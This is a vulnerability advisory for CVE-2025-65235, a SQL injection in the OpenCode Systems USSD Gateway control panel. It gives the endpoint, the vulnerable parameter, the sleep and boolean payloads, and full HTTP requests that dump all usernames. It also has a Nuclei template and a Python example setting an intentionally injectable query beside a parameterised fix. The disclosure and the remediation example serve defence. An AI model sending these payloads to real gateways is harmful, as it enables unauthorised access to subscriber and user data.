[CVE-2025-65235] USSD GW SQL Injection - SubUsers

Technical information about CVE-2025-65235 in the OpenCode USSD GW application.

Description

SQL injection in the USSD Gateway application offered by OpenCode Systems allows a user with access to the vulnerable function to dump the database by injecting SQL commands.

Application Details

  • Name: USSD Gateway

  • Vendor: OpenCode Systems

  • Version: OC Release 5 - Version 6.13.11

Technical Details

  • Vulnerable Endpoint: /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider

  • Vulnerable Parameter: account_id

  • Payload Sample: account_id=1; SELECT SLEEP(5)#

Exploitation

The default request retrieves the username for an account based on its account ID. The request and its response are shown below.

POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: DOMAIN
Cookie: OCPANEL-SESSIONID=9j[...]fmla; openid-state=65c[...]pao%22%3B%7D; _csrf=8643[...]63a_A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]

account_id=1

HTTP/2 200 OK
[...]


{"1" :"USERNAME" }

When the payload is appended to the parameter, the response contains all the usernames.

Different payloads can be used; the one below was used as a PoC.

POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: DOMAIN
Cookie: OCPANEL-SESSIONID=9j[...]fmla; openid-state=65c[...]pao%22%3B%7D; _csrf=8643[...]63a_A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]

account_id=1\+or+1=1--+-

HTTP/2 200 OK
[...]

{ 
	"1" : "Username", "3" : "Username", "4" : "Username", "5" : "Username", "6" : "Username", "7" :"Username", "8" : "Username", "9" :"test Username" ," 10" :"Username" ,"11" :"Username" ," 12" :"Username" ,"13" :"Username" , " 14" :"mu[...]1","15":"mu[...]2" ,"16" :"mu[...]3" ,"17" :"mu[...]4" ,"18" :"mu[...]5"
	[...] 
}
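The root cause and its fix, as an added example that is not the vendor's code: the advisory does not show the application source, so the table `sub_users`, its columns, the sample rows and both function names are assumptions, and an in-memory SQLite database stands in for the real backend. It contrasts a query built by concatenating `account_id` with one that validates the value as an integer and binds it as a parameter.

```python
import json
import sqlite3


def make_db():
    # Constructed sample data; the real schema is not shown in the advisory.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sub_users "
               "(id INTEGER PRIMARY KEY, provider_id INTEGER, username TEXT)")
    db.executemany("INSERT INTO sub_users VALUES (?, ?, ?)",
                   [(1, 1, "alice"), (3, 2, "bob"), (4, 3, "carol")])
    return db


def get_sub_users_vulnerable(db, account_id):
    # Assumed flaw: the request value is concatenated into the SQL text,
    # so anything after the leading number is parsed as SQL.
    sql = ("SELECT id, username FROM sub_users WHERE provider_id = "
           + account_id)
    return {str(i): name for i, name in db.execute(sql)}


def get_sub_users_hardened(db, account_id):
    # 1) Allow-list: account_id must be a plain ASCII decimal integer.
    if not (account_id.isascii() and account_id.isdigit()):
        raise ValueError("account_id must be numeric")
    # 2) Bind the value; the database never parses it as SQL text.
    rows = db.execute(
        "SELECT id, username FROM sub_users WHERE provider_id = ?",
        (int(account_id),))
    return {str(i): name for i, name in rows}


if __name__ == "__main__":
    db = make_db()
    boolean_input = "1 or 1=1-- -"  # same shape as the boolean PoC above
    print(json.dumps(get_sub_users_vulnerable(db, "1")))
    print(json.dumps(get_sub_users_vulnerable(db, boolean_input)))
    for value in ("1", boolean_input, "1; SELECT SLEEP(5)#"):
        try:
            print(value, "->", json.dumps(get_sub_users_hardened(db, value)))
        except ValueError as exc:
            print(value, "-> rejected:", exc)
```
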

Nuclei Template

You can use this template for easy detection.

id: ocpanel-ussdgw-sqli

info:
  name: USSD Gateway OCP Control Panel SQL Injection
  author: Eslam Ali Akl
  severity: high
  description: |
    Time-based SQL injection test for the getSubUsersByProvider endpoint.
    Injects a SLEEP(5) payload into the account_id parameter and flags the
    target if the response time indicates the SQL sleep was executed.
  tags: [sqli, time-based, ocpanel]

requests:
  - id: time_inject
    method: POST
    path:
      - "{{BaseURL}}/occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider"
    headers:
      Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
      X-Requested-With: "XMLHttpRequest"
      User-Agent: "nuclei-scan"
    body: "account_id=1; SELECT SLEEP(5)#"
    matchers:
      - type: dsl
        dsl:
          - "duration >= 4"
